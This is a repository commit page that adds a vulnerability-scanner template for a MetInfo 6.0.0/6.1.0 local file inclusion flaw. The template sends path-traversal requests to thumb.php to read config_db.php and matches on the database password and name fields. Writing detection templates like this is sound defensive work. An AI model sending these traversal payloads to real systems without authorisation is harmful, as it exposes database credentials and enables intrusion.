Create metinfo-lfi.yaml
parent
b602cdfd7c
commit
6e19a6eb45
|
@ -0,0 +1,26 @@
|
|||
id: metinfo-lfi
|
||||
info:
|
||||
name: MetInfo 6.0.0/6.1.0 LFI
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
refrence: https://paper.seebug.org/676/
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/include/thumb.php?dir=http/.....///.....///config/config_db.php'
|
||||
- '{{BaseURL}}/include/thumb.php?dir=..././http..././config/config_db.php'
|
||||
- '{{BaseURL}}/include/thumb.php?dir=.....///http/.....///config/config_db.php'
|
||||
- '{{BaseURL}}/include/thumb.php?dir=http\\..\\..\\config\\config_db.php'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "con_db_pass"
|
||||
- "con_db_name"
|
||||
part: body
|
||||
condition: and
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue